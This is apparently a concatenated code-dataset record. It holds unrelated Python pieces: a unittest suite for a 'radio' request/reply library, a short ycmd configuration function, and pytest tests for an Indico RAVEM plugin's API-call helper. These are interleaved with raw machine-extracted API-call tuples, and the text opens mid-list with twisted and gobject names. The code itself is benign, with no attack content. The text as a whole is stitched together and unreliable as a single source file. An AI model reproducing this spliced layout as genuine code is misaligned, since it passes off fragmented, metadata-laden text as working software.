"twisted.python.log.callWithLogger",
"gobject.main_context_default",
"gobject.MainLoop",
"gtk.main",
"twisted.internet.main.installReactor",
"twisted.internet.error.ConnectionLost",
"twisted.internet.base._SignalReactorMixin._handleSignals",
"gobject.io_add_watch",
"twisted.internet.selectreactor.SelectReactor.crash",
"gobject.timeout_add",
"gobject.source_remove",
"gtk.mainloop"
] | [((1126, 1148), 'gobject.threads_init', 'gobject.threads_init', ([], {}), '()\n', (1146, 1148), False, 'import gobject\n'), ((2087, 2103), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (2101, 2103), False, 'import gtk\n'), ((2597, 2622), 'zope.interface.implements', 'implements', (['IReactorFDSet'], {}), '(IReactorFDSet)\n', (2607, 2622), False, 'from zope.interface import implements\n'), ((12990, 13013), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13004, 13013), False, 'from twisted.internet.main import installReactor\n'), ((13248, 13271), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13262, 13271), False, 'from twisted.internet.main import installReactor\n'), ((13297, 13323), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ([], {}), '()\n', (13321, 13323), False, 'from twisted.python import log, runtime, failure\n'), ((795, 815), 'pygtk.require', 'pygtk.require', (['"""2.0"""'], {}), "('2.0')\n", (808, 815), False, 'import pygtk\n'), ((2113, 2128), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (2126, 2128), False, 'import gtk\n'), ((2711, 2716), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2714, 2716), False, 'from twisted.python.compat import set\n'), ((2740, 2745), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2743, 2745), False, 'from twisted.python.compat import set\n'), ((2781, 2822), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', (['self'], {}), '(self)\n', (2816, 2822), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((7418, 7462), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (7439, 7462), False, 'import gobject\n'), ((8531, 8589), 'twisted.python.log.msg', 'log.msg', ([], {'channel': '"""system"""', 'event': '"""iteration"""', 'reactor': 'self'}), "(channel='system', event='iteration', reactor=self)\n", (8538, 8589), False, 'from twisted.python import log, runtime, failure\n'), ((9360, 9398), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', (['self'], {}), '(self)\n', (9392, 9398), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9547, 9584), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (9566, 9584), False, 'import gobject\n'), ((10856, 10922), 'twisted.python.log.callWithLogger', 'log.callWithLogger', (['source', 'self._doReadOrWrite', 'source', 'condition'], {}), '(source, self._doReadOrWrite, source, condition)\n', (10874, 10922), False, 'from twisted.python import log, runtime, failure\n'), ((11652, 11691), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', (['self'], {}), '(self)\n', (11685, 11691), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11773, 11789), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (11787, 11789), False, 'import gtk\n'), ((12058, 12095), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (12077, 12095), False, 'import gobject\n'), ((3083, 3113), 'gobject.main_context_default', 'gobject.main_context_default', ([], {}), '()\n', (3111, 3113), False, 'import gobject\n'), ((3242, 3260), 'gobject.MainLoop', 'gobject.MainLoop', ([], {}), '()\n', (3258, 3260), False, 'import 
gobject\n'), ((4182, 4227), 'twisted.internet.base._SignalReactorMixin._handleSignals', 'base._SignalReactorMixin._handleSignals', (['self'], {}), '(self)\n', (4221, 4227), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((4587, 4606), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ([], {}), '()\n', (4604, 4606), True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\n'), ((5463, 5512), 'gobject.io_add_watch', 'gobject.io_add_watch', (['source', 'condition', 'callback'], {}), '(source, condition, callback)\n', (5483, 5512), False, 'import gobject\n'), ((5977, 6021), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (5998, 6021), False, 'import gobject\n'), ((9243, 9287), 'gobject.source_remove', 'gobject.source_remove', (['self.doIterationTimer'], {}), '(self.doIterationTimer)\n', (9264, 9287), False, 'import gobject\n'), ((11173, 11208), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (11194, 11208), False, 'import gobject\n'), ((12192, 12202), 'gtk.main', 'gtk.main', ([], {}), '()\n', (12200, 12202), False, 'import gtk\n'), ((12229, 12243), 'gtk.mainloop', 'gtk.mainloop', ([], {}), '()\n', (12241, 12243), False, 'import gtk\n'), ((12398, 12433), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (12419, 12433), False, 'import gobject\n'), ((4403, 4445), 'signal.siginterrupt', 'signal.siginterrupt', (['signal.SIGCHLD', '(False)'], {}), '(signal.SIGCHLD, False)\n', (4422, 4445), False, 'import sys, signal\n'), ((9743, 9765), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ([], {}), '()\n', (9763, 9765), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9814, 9836), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ([], {}), '()\n', (9834, 9836), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11849, 11864), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (11862, 11864), False, 'import gtk\n'), ((11899, 11913), 'gtk.mainquit', 'gtk.mainquit', ([], {}), '()\n', (11911, 11913), False, 'import gtk\n'), ((10665, 10696), 'twisted.python.log.msg', 'log.msg', (["('Error In %s' % source)"], {}), "('Error In %s' % source)\n", (10672, 10696), False, 'from twisted.python import log, runtime, failure\n'), ((10713, 10725), 'twisted.python.log.deferr', 'log.deferr', ([], {}), '()\n', (10723, 10725), False, 'from twisted.python import log, runtime, failure\n'), ((10631, 10645), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10643, 10645), False, 'import sys, signal\n')] |
# -*- coding: utf-8 -*-
from unittest import TestCase, TestLoader
from radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound,
HandlerAlreadyBound)
def init_radio(f):
def wrap(self, *args):
self.radio = Radio()
return f(self, *args)
return wrap
class TestRadioRequestReplyMethods(TestCase):
@init_radio
def test_request_reply_stop_replying(self):
'''
"request", "reply" and "stopReplying" methods work correctly.
'''
def foo_handler(): return 'foo'
def bar_handler(my_arg=222): return my_arg
self.radio.reply('foo', foo_handler)
self.radio.reply('bar', bar_handler)
self.assertEqual(self.radio.request('foo'), 'foo')
self.assertEqual(self.radio.request('bar'), 222)
self.assertEqual(self.radio.request('bar', 333), 333)
self.assertEqual(self.radio.request('bar', my_arg=444), 444)
self.radio.stopReplying('foo')
self.radio.stopReplying('bar')
with self.assertRaises(ListenerNotFound):
self.radio.request('foo')
with self.assertRaises(ListenerNotFound):
self.radio.request('bar')
@init_radio
def test_kwargs(self):
'''
        Keyword arguments work correctly.
'''
foo_list = []
def foo_handler(foo, bar): return (foo, bar)
self.radio.reply('foo', foo_handler)
self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5))
@init_radio
def test_on_already_bound(self):
'''
"reply" fails when trying to bound handler that is already bounded.
'''
def foo_handler(): pass
self.radio.reply('foo', foo_handler)
self.radio.reply('bar', foo_handler)
# General exception
with self.assertRaises(HandlerAlreadyBound):
self.radio.reply('foo', foo_handler)
# Child exception
with self.assertRaises(ReplyHandlerAlreadyBound):
self.radio.reply('foo', foo_handler)
@init_radio
def test_off_handler_that_was_not_bounded(self):
'''
"stopReplying" fails when trying to unbound handler that was not
bounded.
'''
def foo_handler(): pass
with self.assertRaises(ListenerNotFound):
self.radio.stopReplying('foo', foo_handler)
@init_radio
def test_off_soft_mode(self):
'''
"stopReplying" will not fail if safe-argument is set to True.
'''
def foo_handler(): pass
self.radio.stopReplying('foo', foo_handler, soft=True)
self.radio.stopReplying('foo', foo_handler, soft=True)
@init_radio
def test_trigger_fail_on_incorrect_arguments(self):
'''
"request" fails when arguments for handler is incorrect.
'''
def foo_handler(required_arg): pass
self.radio.reply('foo', foo_handler)
with self.assertRaises(TypeError):
self.radio.request('foo')
suite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)
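# Hedged sketch: the suite can be run directly with the standard unittest runner.
#
# if __name__ == '__main__':
#     import unittest
#     unittest.TextTestRunner(verbosity=2).run(suite)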
| [
"radio.Radio",
"unittest.TestLoader"
] | [((248, 255), 'radio.Radio', 'Radio', ([], {}), '()\n', (253, 255), False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\n'), ((3016, 3028), 'unittest.TestLoader', 'TestLoader', ([], {}), '()\n', (3026, 3028), False, 'from unittest import TestCase, TestLoader\n')] |
import os
import sys
DIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )
def Settings( **kwargs ):
return {
'interpreter_path': sys.executable,
'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ]
}
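# Hedged sketch: ycmd invokes Settings(**kwargs) itself; calling it by hand shows
# the effect of the dict above (the keyword names here are illustrative only).
#
# conf = Settings(language='python', filename='/tmp/example.py')
# print(conf['interpreter_path'], conf['sys_path'])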
| [
"os.path.dirname",
"os.path.join"
] | [((60, 85), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (75, 85), False, 'import os\n'), ((187, 234), 'os.path.join', 'os.path.join', (['DIR_OF_THIS_SCRIPT', '"""third_party"""'], {}), "(DIR_OF_THIS_SCRIPT, 'third_party')\n", (199, 234), False, 'import os\n')] |
# This file is part of the CERN Indico plugins.
# Copyright (C) 2014 - 2022 CERN
#
# The CERN Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License; see
# the LICENSE file for more details.
from unittest.mock import MagicMock
import pytest
from requests.exceptions import HTTPError, Timeout
from indico.testing.util import extract_logs
from indico_ravem.plugin import RavemPlugin
from indico_ravem.util import has_access, ravem_api_call
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize('method', ('get', 'post'))
def test_correct_http_method(mocker, method):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2')
assert request.call_count == 1
assert request.call_args[0][0] == method
@pytest.mark.usefixtures('db')
def test_correct_auth_method(mocker):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
token = 'foo'
RavemPlugin.settings.set('access_token', token)
ravem_api_call('test_endpoint', param1='test1', param2='test2')
assert request.call_count == 1
assert 'Authorization' in request.call_args[1]['headers']
assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token
@pytest.mark.usefixtures('db')
def test_accepts_json(mocker):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
ravem_api_call('test_endpoint', param1='test1', param2='test2')
assert request.call_count == 1
assert request.call_args[1]['headers']['Accept'] == 'application/json'
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), (
('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'),
('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'),
('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),
('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'),
('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'),
('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),
('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),
('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),
('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),
('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),
('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),
('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),
('https://ravem.test/', '', 'https://ravem.test/'),
('https://ravem.test/api/', '', 'https://ravem.test/api/'),
('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'),
))
def test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
RavemPlugin.settings.set('api_endpoint', root_endpoint)
ravem_api_call(endpoint, param1='test1', param2='test2')
assert request.call_count == 1
assert request.call_args[0][1] == expected_url
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize('params', (
{},
{'p1': '1stparam'},
{'p1': '1stparam', 'p2': '2ndparam'}
))
def test_params_generated(mocker, params):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
ravem_api_call('test_endpoint', params=params)
assert request.call_count == 1
assert request.call_args[1]['params'] == params
@pytest.mark.usefixtures('db')
def test_raises_timeout(mocker):
request = mocker.patch('indico_ravem.util.requests.request')
request.side_effect = Timeout('Timeout test error message', request=request)
with pytest.raises(Timeout) as excinfo:
ravem_api_call('test_endpoint')
assert str(excinfo.value) == "Timeout while contacting the room."
assert request.call_count == 1
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize(('method', 'params'), (
('get', {}),
('post', {}),
('get', {'p1': '1stparam'}),
('post', {'p1': '1stparam'}),
('get', {'p1': '1stparam', 'p2': '2ndparam'}),
('post', {'p1': '1stparam', 'p2': '2ndparam'})
))
def test_unexpected_exception_is_logged(mocker, caplog, method, params):
request = mocker.patch('indico_ravem.util.requests.request')
request.side_effect = IndexError('this is unexpected')
with pytest.raises(IndexError) as excinfo:
ravem_api_call('test_endpoint', method=method, **params)
assert str(excinfo.value) == 'this is unexpected'
log = extract_logs(caplog, one=True, name='indico.plugin.ravem')
assert log.message == "failed call: {} {} with {}: {}".format(method.upper(), 'test_endpoint', params,
'this is unexpected')
assert request.call_count == 1
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize(('method', 'params'), (
('get', {}),
('post', {}),
('get', {'p1': '1stparam'}),
('post', {'p1': '1stparam'}),
('get', {'p1': '1stparam', 'p2': '2ndparam'}),
('post', {'p1': '1stparam', 'p2': '2ndparam'})
))
def test_http_error_is_logged(mocker, caplog, method, params):
request = mocker.patch('indico_ravem.util.requests.request')
request.method = method.upper()
request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint'
response = MagicMock()
response.raise_for_status.side_effect = HTTPError('Well this is embarrassing')
response.request = request
response.url = response.request.url
request.return_value = response
with pytest.raises(HTTPError) as excinfo:
ravem_api_call('test_endpoint', method=method, **params)
assert str(excinfo.value) == 'Well this is embarrassing'
log = extract_logs(caplog, one=True, name='indico.plugin.ravem')
assert log.message == '{} {} failed with {}'.format(
method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing')
assert request.call_count == 1
@pytest.mark.usefixtures('db')
def test_unlinked_event_vc_room_has_no_access():
event_vc_room = MagicMock()
event_vc_room.link_object = None
assert not has_access(event_vc_room)
@pytest.mark.usefixtures('db', 'request_context')
def test_unlinked_room_has_no_access(mocker):
session = mocker.patch('indico_ravem.util.session')
session.user = '<NAME>'
event_vc_room = MagicMock()
event_vc_room.link_object.room = None
assert not has_access(event_vc_room)
@pytest.mark.usefixtures('db', 'request_context')
def test_check_if_current_user_is_room_owner(mocker):
session = mocker.patch('indico_ravem.util.session')
session.user = '<NAME>'
request = mocker.patch('indico_ravem.util.request')
request.remote_addr = '192.168.127.12'
retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal')
retrieve_principal.side_effect = lambda x: session.user
event_vc_room = MagicMock()
event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)
event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr
event_vc_room.vc_room.data.get.return_value = 'User:123'
event_vc_room.event.can_manage.return_value = False
assert has_access(event_vc_room)
@pytest.mark.usefixtures('db', 'request_context')
def test_check_if_current_user_can_modify(mocker):
request = mocker.patch('indico_ravem.util.request')
request.remote_addr = '192.168.127.12'
session = mocker.patch('indico_ravem.util.session')
session.user = '<NAME>'
mocker.patch('indico_ravem.util._retrieve_principal')
event_vc_room = MagicMock()
event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)
event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr
event_vc_room.event.can_manage.return_value = True
assert has_access(event_vc_room)
event_vc_room.event.can_manage.assert_called_once_with(session.user)
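# Hedged note: these tests are meant to be collected by pytest; the `db` and
# `request_context` fixtures referenced above come from Indico's own pytest
# plugins, and `mocker` from pytest-mock. A typical invocation (file name
# hypothetical) would be:
#   pytest test_ravem_util.py -k has_access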
| [
"unittest.mock.MagicMock",
"indico.testing.util.extract_logs",
"indico_ravem.plugin.RavemPlugin.settings.get",
"indico_ravem.util.has_access",
"pytest.mark.parametrize",
"pytest.raises",
"pytest.mark.usefixtures",
"requests.exceptions.HTTPError",
"indico_ravem.plugin.RavemPlugin.settings.set",
"indico_ravem.util.ravem_api_call",
"requests.exceptions.Timeout"
] | [((506, 535), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (529, 535), False, 'import pytest\n'), ((537, 587), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""method"""', "('get', 'post')"], {}), "('method', ('get', 'post'))\n", (560, 587), False, 'import pytest\n'), ((1033, 1062), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1056, 1062), False, 'import pytest\n'), ((1655, 1684), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1678, 1684), False, 'import pytest\n'), ((2130, 2159), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (2153, 2159), False, 'import pytest\n'), ((2161, 3611), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('root_endpoint', 'endpoint', 'expected_url')", "(('https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/'))"], {}), "(('root_endpoint', 'endpoint', 'expected_url'), ((\n 'https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), 
('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/')))\n", (2184, 3611), False, 'import pytest\n'), ((4101, 4130), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4124, 4130), False, 'import pytest\n'), ((4132, 4233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""params"""', "({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})"], {}), "('params', ({}, {'p1': '1stparam'}, {'p1':\n '1stparam', 'p2': '2ndparam'}))\n", (4155, 4233), False, 'import pytest\n'), ((4661, 4690), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4684, 4690), False, 'import pytest\n'), ((5064, 5093), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (5087, 5093), False, 'import pytest\n'), ((5095, 5336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (5118, 5336), False, 'import pytest\n'), ((6017, 6046), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (6040, 6046), False, 'import pytest\n'), ((6048, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (6071, 6289), False, 'import pytest\n'), ((7213, 7242), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (7236, 7242), False, 'import pytest\n'), ((7406, 7454), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7429, 7454), False, 'import pytest\n'), ((7705, 7753), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7728, 7753), False, 'import pytest\n'), ((8491, 8539), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (8514, 8539), False, 'import pytest\n'), ((714, 725), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (723, 725), False, 'from unittest.mock import MagicMock\n'), ((870, 948), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method', 'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', method=method, param1='test1', param2='test2')\n", (884, 948), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1181, 1192), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1190, 1192), False, 'from unittest.mock import MagicMock\n'), ((1355, 1402), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""access_token"""', 'token'], {}), "('access_token', token)\n", (1379, 1402), False, 'from 
indico_ravem.plugin import RavemPlugin\n'), ((1407, 1470), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1421, 1470), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1796, 1807), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1805, 1807), False, 'from unittest.mock import MagicMock\n'), ((1952, 2015), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1966, 2015), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((3738, 3749), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3747, 3749), False, 'from unittest.mock import MagicMock\n'), ((3894, 3949), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""api_endpoint"""', 'root_endpoint'], {}), "('api_endpoint', root_endpoint)\n", (3918, 3949), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((3954, 4010), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['endpoint'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "(endpoint, param1='test1', param2='test2')\n", (3968, 4010), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4367, 4378), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (4376, 4378), False, 'from unittest.mock import MagicMock\n'), ((4523, 4569), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'params': 'params'}), "('test_endpoint', params=params)\n", (4537, 4569), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4815, 4869), 'requests.exceptions.Timeout', 'Timeout', (['"""Timeout test error message"""'], {'request': 'request'}), "('Timeout test error message', request=request)\n", (4822, 4869), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((5725, 5783), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (5737, 5783), False, 'from indico.testing.util import extract_logs\n'), ((6559, 6570), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (6568, 6570), False, 'from unittest.mock import MagicMock\n'), ((6615, 6653), 'requests.exceptions.HTTPError', 'HTTPError', (['"""Well this is embarrassing"""'], {}), "('Well this is embarrassing')\n", (6624, 6653), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((6945, 7003), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (6957, 7003), False, 'from indico.testing.util import extract_logs\n'), ((7312, 7323), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7321, 7323), False, 'from unittest.mock import MagicMock\n'), ((7606, 7617), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7615, 7617), False, 'from unittest.mock import MagicMock\n'), ((8151, 8162), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8160, 8162), False, 'from unittest.mock import MagicMock\n'), ((8214, 8242), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8223, 8242), False, 'from unittest.mock import MagicMock\n'), ((8462, 8487), 'indico_ravem.util.has_access', 'has_access', 
